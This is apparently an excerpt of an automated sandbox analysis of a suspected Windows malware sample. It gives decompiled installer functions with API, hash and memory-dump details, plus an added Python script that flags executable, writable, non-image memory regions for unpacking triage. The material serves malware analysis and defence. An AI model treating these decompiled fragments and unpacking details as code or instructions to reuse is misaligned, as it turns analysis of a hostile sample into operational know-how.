                • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E00405C90(CHAR* _a4, long _a8, long _a12) {
                				signed int _t5;
                				void* _t6;
                
                				_t5 = GetFileAttributesA(_a4); // executed
                				asm("sbb ecx, ecx");
                				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                				return _t6;
                			}

                Instruction addresses for the statements above, in order: 0x00405c94 0x00405ca1 0x00405cb6 0x00405cbc

                APIs
                • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\bGf2H3tXGg.exe,80000000,00000003), ref: 00405C94
                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: File$AttributesCreate
                • String ID:
                • API String ID: 415043291-0
                • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405C6B(CHAR* _a4) {
                				signed char _t3;
                				signed char _t7;
                
                				_t3 = GetFileAttributesA(_a4); // executed
                				_t7 = _t3;
                				if(_t7 != 0xffffffff) {
                					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                				}
                				return _t7;
                			}

                Instruction addresses for the statements above, in order: 0x00405c70 0x00405c76 0x00405c7b 0x00405c84 0x00405c84 0x00405c8d

                APIs
                • GetFileAttributesA.KERNELBASE(?,?,00405883,?,?,00000000,00405A66,?,?,?,?), ref: 00405C70
                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C84
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                • Instruction ID: e57869254d9b62c000b772120ebafc6e643eb49c03cb969dc299021a919e5f7f
                • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                • Instruction Fuzzy Hash: 67D0C972504521AFD2142728AE0889BBB55DB54271702CB36FDA5A26B1DB304C569A98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405761(CHAR* _a4) {
                				int _t2;
                
                				_t2 = CreateDirectoryA(_a4, 0); // executed
                				if(_t2 == 0) {
                					return GetLastError();
                				}
                				return 0;
                			}

                APIs
                • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CreateDirectoryErrorLast
                • String ID:
                • API String ID: 1375471231-0
                • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405D08(void* _a4, void* _a8, long _a12) {
                				int _t7;
                				long _t11;
                
                				_t11 = _a12;
                				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                				if(_t7 == 0 || _t11 != _a12) {
                					return 0;
                				} else {
                					return 1;
                				}
                			}

                APIs
                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405D37(void* _a4, void* _a8, long _a12) {
                				int _t7;
                				long _t11;
                
                				_t11 = _a12;
                				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                				if(_t7 == 0 || _t11 != _a12) {
                					return 0;
                				} else {
                					return 1;
                				}
                			}

                APIs
                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: FileWrite
                • String ID:
                • API String ID: 3934441357-0
                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403300(long _a4) {
                				long _t2;
                
                				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                				return _t2;
                			}

                APIs
                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • Sleep.KERNELBASE(?,?,034CF0BF), ref: 02281044
                Memory Dump Source
                • Source File: 00000000.00000002.251449636.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 9f8e9afcff0953be4abdc7022b41d52809bd19f33aa56f18cc0135c0cf60f568
                • Instruction ID: e4ee612ac31d99bcd5caaeb5a6b92f174ef29765723f16da938bd8c8cb38233f
                • Opcode Fuzzy Hash: 9f8e9afcff0953be4abdc7022b41d52809bd19f33aa56f18cc0135c0cf60f568
                • Instruction Fuzzy Hash: 8AD017B1C61348BBCB10FBE1C84A89DBB6DEB10701F20829AAC0066185EA759B109A60
                Uniqueness

                Uniqueness Score: -1.00%
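
                The Sleep reference above resolves into a dump of a region at 0x02280000 whose name carries protection field 0x40 (PAGE_EXECUTE_READWRITE) and which the report marks "based on PE: false", while every dump of the original image at 0x400000 is PAGE_READONLY, PAGE_EXECUTE_READ or PAGE_READWRITE and PE-backed. For an analyst that RWX, non-image region is the first place to look for the unpacked payload. The script below is an added example, not part of the Joe Sandbox report: it parses the .sdmp file names listed on this page and returns the executable, writable, non-PE-backed regions. The field layout of the names is an assumption inferred from the names themselves; only the protection field is decoded, using the Windows PAGE_* constants, and the remaining fields are kept as raw integers.

```python
"""Triage Joe Sandbox memory-dump names by page protection.

Added example, not part of the sandbox report. Assumed field layout,
inferred from the dump names on this page and not documented here:

    <process>.<stage>.<dump id>.<base address>.<protection>.<type>.sdmp

Only the protection field is decoded, using the Windows PAGE_* constants
from winnt.h; the other fields are kept as raw integers.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Windows memory-protection constants (winnt.h).
PAGE_NOACCESS = 0x01
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80

PAGE_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS",
    PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE",
    PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE",
    PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITE_MASK = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

_NAME_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\."
    r"([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    process: int
    stage: int
    dump_id: int
    base: int
    protection: int
    kind: int          # meaning of this field is not given on the page; kept raw
    based_on_pe: bool  # the report's own "based on PE" flag for the dump

    @property
    def protection_name(self) -> str:
        # The low byte carries the access type; 0x100/0x200/0x400 are modifier bits.
        return PAGE_NAMES.get(self.protection & 0xFF, f"0x{self.protection:x}")

    @property
    def executable(self) -> bool:
        return bool(self.protection & EXECUTE_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protection & WRITE_MASK)


def parse_dump_name(name: str, based_on_pe: bool) -> DumpRegion:
    """Split one .sdmp file name into its fields (layout assumed, see module docstring)."""
    m = _NAME_RE.match(name)
    if m is None:
        raise ValueError(f"not a recognised dump name: {name!r}")
    proc, stage, dump_id, base, prot, kind = m.groups()
    return DumpRegion(name, int(proc, 16), int(stage, 16), int(dump_id),
                      int(base, 16), int(prot, 16), int(kind, 16), based_on_pe)


def suspicious_regions(regions: Iterable[DumpRegion]) -> List[DumpRegion]:
    """Executable, writable and not backed by a PE on disk: unpacked-payload candidates."""
    return [r for r in regions if r.executable and r.writable and not r.based_on_pe]


# Dump names as they appear on this page. The PE flag is the report's own: the
# 0x400000 image regions are listed under a "based on PE: true" source, the
# 0x02280000 region under "based on PE: false".
PAGE_DUMPS: List[Tuple[str, bool]] = [
    ("00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp", True),
    ("00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp", True),
    ("00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp", True),
    ("00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp", True),
    ("00000000.00000002.251449636.0000000002280000.00000040.00000001.sdmp", False),
]


def triage(dumps: Iterable[Tuple[str, bool]]) -> List[DumpRegion]:
    """Parse every listed dump and keep only the regions worth unpacking first."""
    return suspicious_regions(parse_dump_name(n, pe) for n, pe in dumps)


if __name__ == "__main__":
    for r in triage(PAGE_DUMPS):
        print(f"{r.name}: base=0x{r.base:x} {r.protection_name} based_on_pe={r.based_on_pe}")
```

                Run against the names on this page, only the 0x02280000 region survives the filter; the image sections at 0x400000 are either not writable or not executable. The same filter applied to a full report's dump list gives the short list of regions to carve a PE from before any of the PE-backed dumps are worth opening.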

                C-Code - Quality: 100%
                			E00405ABA(CHAR* _a4, intOrPtr _a8) {
                				CHAR* _t3;
                				char _t4;
                
                				_t3 = _a4;
                				while(1) {
                					_t4 =  *_t3;
                					if(_t4 == 0) {
                						break;
                					}
                					if(_t4 != _a8) {
                						_t3 = CharNextA(_t3); // executed
                						continue;
                					}
                					break;
                				}
                				return _t3;
                			}

                APIs
                • CharNextA.USER32(?,00403455,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,00000020,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00405AC7
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CharNext
                • String ID:
                • API String ID: 3213498283-0
                • Opcode ID: 1083c57b7f4745178c71a6651c3ca9c923e8efe26efc9521b350556c87d1c9f6
                • Instruction ID: e7db52908d3e8830c535cfb70526cc2daabbcaa08dbe50b4a99c3e39ed970d4a
                • Opcode Fuzzy Hash: 1083c57b7f4745178c71a6651c3ca9c923e8efe26efc9521b350556c87d1c9f6
                • Instruction Fuzzy Hash: 00C08030208F8057CB10571091644677FF0FAD1700F7C496BF0C163150D13458408F36
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                C-Code - Quality: 96%
                			E0040535C(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                				struct HWND__* _v8;
                				struct tagRECT _v24;
                				void* _v32;
                				signed int _v36;
                				int _v40;
                				int _v44;
                				signed int _v48;
                				int _v52;
                				void* _v56;
                				void* _v64;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				struct HWND__* _t87;
                				struct HWND__* _t89;
                				long _t90;
                				int _t95;
                				int _t96;
                				long _t99;
                				void* _t102;
                				intOrPtr _t124;
                				struct HWND__* _t128;
                				int _t150;
                				int _t153;
                				long _t157;
                				struct HWND__* _t161;
                				struct HMENU__* _t163;
                				long _t165;
                				void* _t166;
                				char* _t167;
                				char* _t168;
                				int _t169;
                
                				_t87 =  *0x42ec04; // 0x0
                				_t157 = _a8;
                				_t150 = 0;
                				_v8 = _t87;
                				if(_t157 != 0x110) {
                					__eflags = _t157 - 0x405;
                					if(_t157 == 0x405) {
                						CloseHandle(CreateThread(0, 0, E004052F0, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
                					}
                					__eflags = _t157 - 0x111;
                					if(_t157 != 0x111) {
                						L17:
                						__eflags = _t157 - 0x404;
                						if(_t157 != 0x404) {
                							L25:
                							__eflags = _t157 - 0x7b;
                							if(_t157 != 0x7b) {
                								goto L20;
                							}
                							_t89 = _v8;
                							__eflags = _a12 - _t89;
                							if(_a12 != _t89) {
                								goto L20;
                							}
                							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                							__eflags = _t90 - _t150;
                							_a12 = _t90;
                							if(_t90 <= _t150) {
                								L36:
                								return 0;
                							}
                							_t163 = CreatePopupMenu();
                							AppendMenuA(_t163, _t150, 1, E0040618A(_t150, _t157, _t163, _t150, 0xffffffe1));
                							_t95 = _a16;
                							__eflags = _a16 - 0xffffffff;
                							_t153 = _a16 >> 0x10;
                							if(_a16 == 0xffffffff) {
                								GetWindowRect(_v8,  &_v24);
                								_t95 = _v24.left;
                								_t153 = _v24.top;
                							}
                							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                							__eflags = _t96 - 1;
                							if(_t96 == 1) {
                								_t165 = 1;
                								__eflags = 1;
                								_v56 = _t150;
                								_v44 = 0x42a890;
                								_v40 = 0x1000;
                								_a4 = _a12;
                								do {
                									_a4 = _a4 - 1;
                									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                									__eflags = _a4 - _t150;
                									_t165 = _t165 + _t99 + 2;
                								} while (_a4 != _t150);
                								OpenClipboard(_t150);
                								EmptyClipboard();
                								_t102 = GlobalAlloc(0x42, _t165);
                								_a4 = _t102;
                								_t166 = GlobalLock(_t102);
                								do {
                									_v44 = _t166;
                									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                									 *_t167 = 0xd;
                									_t168 = _t167 + 1;
                									 *_t168 = 0xa;
                									_t166 = _t168 + 1;
                									_t150 = _t150 + 1;
                									__eflags = _t150 - _a12;
                								} while (_t150 < _a12);
                								GlobalUnlock(_a4);
                								SetClipboardData(1, _a4);
                								CloseClipboard();
                							}
                							goto L36;
                						}
                						__eflags =  *0x42ebec - _t150; // 0x0
                						if(__eflags == 0) {
                							ShowWindow( *0x42f428, 8);
                							__eflags =  *0x42f4cc - _t150;
                							if( *0x42f4cc == _t150) {
                								E0040521E( *((intOrPtr*)( *0x42a068 + 0x34)), _t150);
                							}
                							E00404154(1);
                							goto L25;
                						}
                						 *0x429c60 = 2;
                						E00404154(0x78);
                						goto L20;
                					} else {
                						__eflags = _a12 - 0x403;
                						if(_a12 != 0x403) {
                							L20:
                							return E004041E2(_t157, _a12, _a16);
                						}
                						ShowWindow( *0x42ebf0, _t150);
                						ShowWindow(_v8, 8);
                						E004041B0(_v8);
                						goto L17;
                					}
                				}
                				_v48 = _v48 | 0xffffffff;
                				_v36 = _v36 | 0xffffffff;
                				_t169 = 2;
                				_v56 = _t169;
                				_v52 = 0;
                				_v44 = 0;
                				_v40 = 0;
                				asm("stosd");
                				asm("stosd");
                				_t124 =  *0x42f434;
                				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
                				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
                				_t128 = GetDlgItem(_a4, 0x3f8);
                				 *0x42ec04 = _t128;
                				_v8 = _t128;
                				E004041B0( *0x42ebf0);
                				 *0x42ebf4 = E00404AA1(4);
                				 *0x42ec0c = 0;
                				GetClientRect(_v8,  &_v24);
                				_v48 = _v24.right - GetSystemMetrics(_t169);
                				SendMessageA(_v8, 0x101b, 0,  &_v56);
                				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                				if(_a12 >= 0) {
                					SendMessageA(_v8, 0x1001, 0, _a12);
                					SendMessageA(_v8, 0x1026, 0, _a12);
                				}
                				if(_a8 >= _t150) {
                					SendMessageA(_v8, 0x1024, _t150, _a8);
                				}
                				_push( *((intOrPtr*)(_a16 + 0x30)));
                				_push(0x1b);
                				E0040417B(_a4);
                				if(( *0x42f43c & 0x00000003) != 0) {
                					ShowWindow( *0x42ebf0, _t150);
                					if(( *0x42f43c & 0x00000002) != 0) {
                						 *0x42ebf0 = _t150;
                					} else {
                						ShowWindow(_v8, 8);
                					}
                					E004041B0( *0x42ebe8);
                				}
                				_t161 = GetDlgItem(_a4, 0x3ec);
                				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                				if(( *0x42f43c & 0x00000004) != 0) {
                					SendMessageA(_t161, 0x409, _t150, _a8);
                					SendMessageA(_t161, 0x2001, _t150, _a12);
                				}
                				goto L36;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                • String ID:
                • API String ID: 590372296-0
                • Opcode ID: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                • Opcode Fuzzy Hash: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E0040460D(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                				signed int _v8;
                				signed int _v12;
                				long _v16;
                				long _v20;
                				long _v24;
                				char _v28;
                				intOrPtr _v32;
                				long _v36;
                				char _v40;
                				unsigned int _v44;
                				signed int _v48;
                				CHAR* _v56;
                				intOrPtr _v60;
                				intOrPtr _v64;
                				intOrPtr _v68;
                				CHAR* _v72;
                				void _v76;
                				struct HWND__* _v80;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr _t82;
                				long _t87;
                				signed char* _t89;
                				void* _t95;
                				signed int _t96;
                				int _t109;
                				signed char _t114;
                				signed int _t118;
                				struct HWND__** _t122;
                				intOrPtr* _t138;
                				CHAR* _t146;
                				intOrPtr _t147;
                				unsigned int _t150;
                				signed int _t152;
                				unsigned int _t156;
                				signed int _t158;
                				signed int* _t159;
                				signed char* _t160;
                				struct HWND__* _t165;
                				struct HWND__* _t166;
                				int _t168;
                				unsigned int _t197;
                
                				_t156 = __edx;
                				_t82 =  *0x42a068;
                				_v32 = _t82;
                				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
                				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                				if(_a8 == 0x40b) {
                					E004057F7(0x3fb, _t146);
                					E004063D2(_t146);
                				}
                				_t166 = _a4;
                				if(_a8 != 0x110) {
                					L8:
                					if(_a8 != 0x111) {
                						L20:
                						if(_a8 == 0x40f) {
                							L22:
                							_v8 = _v8 & 0x00000000;
                							_v12 = _v12 & 0x00000000;
                							E004057F7(0x3fb, _t146);
                							if(E00405B7D(_t185, _t146) == 0) {
                								_v8 = 1;
                							}
                							E004060F7(0x429860, _t146);
                							_t87 = E00406500(1);
                							_v16 = _t87;
                							if(_t87 == 0) {
                								L30:
                								E004060F7(0x429860, _t146);
                								_t89 = E00405B28(0x429860);
                								_t158 = 0;
                								if(_t89 != 0) {
                									 *_t89 =  *_t89 & 0x00000000;
                								}
                								if(GetDiskFreeSpaceA(0x429860,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                									goto L35;
                								} else {
                									_t168 = 0x400;
                									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                									asm("cdq");
                									_v48 = _t109;
                									_v44 = _t156;
                									_v12 = 1;
                									goto L36;
                								}
                							} else {
                								_t159 = 0;
                								if(0 == 0x429860) {
                									goto L30;
                								} else {
                									goto L26;
                								}
                								while(1) {
                									L26:
                									_t114 = _v16(0x429860,  &_v48,  &_v28,  &_v40);
                									if(_t114 != 0) {
                										break;
                									}
                									if(_t159 != 0) {
                										 *_t159 =  *_t159 & _t114;
                									}
                									_t160 = E00405AD6(0x429860);
                									 *_t160 =  *_t160 & 0x00000000;
                									_t159 = _t160 - 1;
                									 *_t159 = 0x5c;
                									if(_t159 != 0x429860) {
                										continue;
                									} else {
                										goto L30;
                									}
                								}
                								_t150 = _v44;
                								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                								_v44 = _t150 >> 0xa;
                								_v12 = 1;
                								_t158 = 0;
                								__eflags = 0;
                								L35:
                								_t168 = 0x400;
                								L36:
                								_t95 = E00404AA1(5);
                								if(_v12 != _t158) {
                									_t197 = _v44;
                									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                										_v8 = 2;
                									}
                								}
                								_t147 =  *0x42ebfc; // 0x739685
                								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                									E00404A89(0x3ff, 0xfffffffb, _t95);
                									if(_v12 == _t158) {
                										SetDlgItemTextA(_a4, _t168, 0x429850);
                									} else {
                										E004049C4(_t168, 0xfffffffc, _v48, _v44);
                									}
                								}
                								_t96 = _v8;
                								 *0x42f4e4 = _t96;
                								if(_t96 == _t158) {
                									_v8 = E0040140B(7);
                								}
                								if(( *(_v32 + 0x14) & _t168) != 0) {
                									_v8 = _t158;
                								}
                								E0040419D(0 | _v8 == _t158);
                								if(_v8 == _t158 &&  *0x42a880 == _t158) {
                									E00404566();
                								}
                								 *0x42a880 = _t158;
                								goto L53;
                							}
                						}
                						_t185 = _a8 - 0x405;
                						if(_a8 != 0x405) {
                							goto L53;
                						}
                						goto L22;
                					}
                					_t118 = _a12 & 0x0000ffff;
                					if(_t118 != 0x3fb) {
                						L12:
                						if(_t118 == 0x3e9) {
                							_t152 = 7;
                							memset( &_v76, 0, _t152 << 2);
                							_v80 = _t166;
                							_v72 = 0x42a890;
                							_v60 = E0040495E;
                							_v56 = _t146;
                							_v68 = E0040618A(_t146, 0x42a890, _t166, 0x429c68, _v12);
                							_t122 =  &_v80;
                							_v64 = 0x41;
                							__imp__SHBrowseForFolderA(_t122);
                							if(_t122 == 0) {
                								_a8 = 0x40f;
                							} else {
                								__imp__CoTaskMemFree(_t122);
                								E00405A8F(_t146);
                								_t125 =  *((intOrPtr*)( *0x42f434 + 0x11c));
                								if( *((intOrPtr*)( *0x42f434 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
                									E0040618A(_t146, 0x42a890, _t166, 0, _t125);
                									if(lstrcmpiA(0x42e3c0, 0x42a890) != 0) {
                										lstrcatA(_t146, 0x42e3c0);
                									}
                								}
                								 *0x42a880 =  *0x42a880 + 1;
                								SetDlgItemTextA(_t166, 0x3fb, _t146);
                							}
                						}
                						goto L20;
                					}
                					if(_a12 >> 0x10 != 0x300) {
                						goto L53;
                					}
                					_a8 = 0x40f;
                					goto L12;
                				} else {
                					_t165 = GetDlgItem(_t166, 0x3fb);
                					if(E00405AFC(_t146) != 0 && E00405B28(_t146) == 0) {
                						E00405A8F(_t146);
                					}
                					 *0x42ebf8 = _t166;
                					SetWindowTextA(_t165, _t146);
                					_push( *((intOrPtr*)(_a16 + 0x34)));
                					_push(1);
                					E0040417B(_t166);
                					_push( *((intOrPtr*)(_a16 + 0x30)));
                					_push(0x14);
                					E0040417B(_t166);
                					E004041B0(_t165);
                					_t138 = E00406500(8);
                					if(_t138 == 0) {
                						L53:
                						return E004041E2(_a8, _a12, _a16);
                					} else {
                						 *_t138(_t165, 1);
                						goto L8;
                					}
                				}
                			}
                Statement addresses in this listing: 0x0040460d to 0x0040495b

                APIs
                • GetDlgItem.USER32 ref: 0040465C
                • SetWindowTextA.USER32(00000000,?), ref: 00404686
                • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                • CoTaskMemFree.OLE32(00000000), ref: 00404742
                • lstrcmpiA.KERNEL32(Cgrlcpdlsle,0042A890,00000000,?,?), ref: 00404774
                • lstrcatA.KERNEL32(?,Cgrlcpdlsle), ref: 00404780
                • SetDlgItemTextA.USER32 ref: 00404792
                  • Part of subcall function 004057F7: GetDlgItemTextA.USER32 ref: 0040580A
                  • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                  • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
